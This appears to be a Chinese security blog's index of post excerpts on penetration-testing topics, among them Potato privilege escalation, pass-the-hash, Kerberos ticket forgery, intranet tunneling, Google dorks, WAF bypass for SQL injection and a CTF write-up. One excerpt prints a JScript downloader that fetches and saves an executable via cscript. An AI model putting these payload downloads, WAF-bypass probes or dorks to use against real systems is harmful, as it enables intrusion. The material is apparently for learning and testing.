土豆提权历史进程
0x01简介在研究提权的时候,发现最近这些东西比较多,而且我自己看起来也是比较混乱,就从网上收集了一些资料,做一个整合和搬运,复现和整理一下,方便你我
现在还是有点迷糊,这个估计会再更新,等我再理的清楚一些,然后后面就是单个的文章发布,这个是总的简介
0x01 历史进程2016-01-16 初代土豆劫持wpad配合ntlm中继来进行提权
Hot Potato – Windows Privilege Escalation
2016-09-26 二代土豆劫持系统com服务器地址到恶意服务器上,然后在NTLM Type 3时做AcceptSecurityContext调用去拿system的令牌
Rotten Potato – Privilege Escalation from Service
2018/01/13 土豆token细节Potatoes and tokens – Decoder’s Blog
2018-08-10 整理了一些可用的CLSID Juicy Potato (abusing the golden privileges) | jui…
2018& ...
docker:打包正在运行的容器,快速拖环境跑路
遇到了一个docker环境,需求带回来自己调试,所以记录大致流程docker:打包正在运行的容器,快速拖环境跑路
获取正在运行的容器1docker ps
找到ID 6996fffb6bfa
将容器打包成镜像1docker commit -a "runoob.com" -m "my apache" 容器名称或id 打包的镜像名称:标签
拖到本地1docker save cnvd -o /Users/zy/Documents/source/sec.tar
导入镜像1docker load -i hackgod-demo.tar
内网安全:NTML认证流程和PTH原理
NTML认证流程和PTH原理.
0x01 本地认证流程
0x02 网络认证
LM Hash和NTML Hash
NTLM Hash
NTLM V2协议
0x03 NTLM 认证
0x04 Pass The Hash (PTH)原理
主要作用:
前提:
原理:
使用方法:
绕过补丁,进行哈希传递
0x01 本地认证流程操作系统会显示登录界面,接收输入密码后,将密码交给lsass进程,这个进程中会存一份明文密码,将明文密码加密成NTLM Hash,和SAM数据库比较认证。
注:
winlogon.exe(Windows Logon Process),用于管理用户登录和退出。
LSASS用于微软Windows系统的安全机制,它用于本地安全和登陆策略。
0x02 网络认证在内网中,早期SMB协议在网络上传输明文口令。后来出现LM hash,很容易就被破解,现在又有了NTLM以及Kerberos。
LM Hash和NTML HashWindows操作系统中的密码由两部分加密组成,即LM Hash和NTML Hash。
NTLM Hash正常的明文密码加密为NTLM ...
内网安全:Kerberos域认证流程---黄金票据和白银票据
文章目录
0x00 前提
0x01 Kerberos域认证
域认证大致流程:
第一部分:生成TGT 和 session key
第二步:获取要访问的 server ticket
第三部 向客户端向服务器请求认证
0x01 白银票据(Silver Tickets)
伪造白银票据(Silver Tickets)
0x02 黄金票据(Golden Ticket)
伪造黄金票据
0x03 黄金票据和白银票据比较
0x04 参考
0x00 前提算是学习之后总结记录,加深自己的理解,这里我是参考了倾旋师傅的讲解,感觉讲的比较好,加入自己的理解和一些其他东西写下来,分享出来,也方便自己回顾知识和补充还有画图的问题,我自己画的太费劲了而且也看不明白,索性我就自己手画了几个,方便自己理解和熟悉流程,感觉不错,手动狗头,哈哈
0x01 Kerberos域认证Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网 ...
网鼎杯 AreUSerialz反序列化题目
看了网鼎杯 AreUSerialz反序列化题目wp对php的反序列化又有了学到了新的知识点,之前都没注意到
标题题目是这样的:123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function _ ...
内网安全学习从入门到入狱-知识-内网隧道技术小结
文章目录
0x00 内网穿透技术
0x01 首先判断出网协议
0x02 各种协议隧道
网络层
ICMP隧道
Lcx
传输层
瑞士军刀:nc
Powercat(powershell版的nc)
推荐:netsh端口转发(window平台)
应用层
SSH转发:
SSH 本地转发机制:
SSH 远程转发机制:
SSH 动态转发机制:
HTTP HTTPS协议隧道
DNS 隧道:
Socks代理:
推荐使用
Nps
ew
Frp
Venom
0x03 总结
0x00 内网穿透技术当我们拿到一台内网主机后,一般都是有区域隔离的。
所以内网隧道技术,就是我们必须要掌握的。
我简单介绍一下建立通信隧道,常见的有端口转发等
主要隧道有:
ICMP TCP UDP
SSH HTTP DNS
SOCKS
0x01 首先判断出网协议icmp协议:
12ping 命令ping www.baidu.com
TCP协议:
12curl www.baidu.comnc IP
HTTP协议:
12curl ip:portcurl www.baidu.com:80
DNS协议:
12Nsl ...
google hack搜索引擎常用总结
简介
在渗透测试中,利用搜索引擎信息收集还是很不错,常常有意外的收获,也可以用在一些镜像库里面搜索信息收集
还有之前看到的一些,都总结分享一下
主要的常用一些语法12345678910111213site:可以限制你搜索范围的域名inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.intext: 只搜索网页部分中包含的文字(也就是忽略了标题、URL等的文字)intitle: 查包含关键词的页面,一般用于社工别人的webshell密码filetype:搜索文件的后缀或者扩展名intitle:限制你搜索的网页标题.link: 可以得到一个所有包含了某个指定URL的页面列表.
实例查找后台地址:site域名
12这个真的好用查看某公司的表格找账户:site:域名 filetype:xlsx
1234567891011121314151617inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms查找文本内容:site:域名 intext:管理 ...
一句话下载payload(持续更新)
js一句话下载payloadwindows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。
12345678var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("micropoor.exe");
1C:\test>cscript /nologo dowfile2.js http://192.168.1.1/eval.exe
还 ...
从绕过安全狗到编写tamper脚本
文章目录
0x00 简述
0x01 首先我们要判断哪个关键字被拦截了
0x02 一些简单的知识点
0x03 总结安全狗拦截的点
0x04 Sqlmap tamper的编写
0x05 tamper主要的三个部分
0x06 tamper编写测试方法
0x07 结束
0x00 简述
安全狗这些waf都是有一个特性,都是基于正则匹配去过滤的
但是实际情况是需要权衡可用性和安全性
当然厂商肯定是考虑到用户体验,所以不能出现什么东西都拦截
所以最终就是正则的绕过
注意:
版本不同,他的正则规则也是不一样的
所以有的payload在新老版本是不能同吃。
但是没有关系,你学会这么绕,这都不是问题。
0x01 首先我们要判断哪个关键字被拦截了我们以 order by 3 这个简单的语句为例子
提供思路就是破坏单词去测试:
123456http://10.211.55.4/Less-2/?id=1 order by 3 (拦截)http://10.211.55.4/Less-2/?id=1 ordwer by 3 (破坏了order 没有拦截)http://10.211.55.4/Less-2/ ...
记一次360众测仿真实战靶场考核WP
0x00 考核主要分为两部分
第一部分为客观题:分为单选题,多选题,和判断题。
我记录了一道有趣的题,也是不清楚正确答案的群
第二部分为操作题:
0x01客观题我记录了一道有趣的题,也是不清楚正确答案,有大佬知道吗
0x02:操作题
源码分析题,给你源码提及一个数据
PHP == 弱语言绕过 ,因为没弄过CTF也是印象比较深刻
网站被黑,可以下载整站,找后门
下载源码,找见后门webshell,看一眼,变形的一句话,连上
一个加密的一句话木马
就普通一句话各种decode
IP伪造登陆 X-FORWORD
只能客户端登陆
一个弹幕网站
进去发现是Struts2的,有工具一把梭
xxx系统的数据库系统。postgresql
识别出来是postgresql,但是连上了啥也没找到,没做出来。。。
一个登录框
点点发现有注入,sqlmap直接跑了
wireshark分析数据包的
有人改了数据库密码 找到修改的 数据库密码
wireshark分析数据包的
删除数据库记录的ip
wireshark分析数据包的
找上传者的ip
...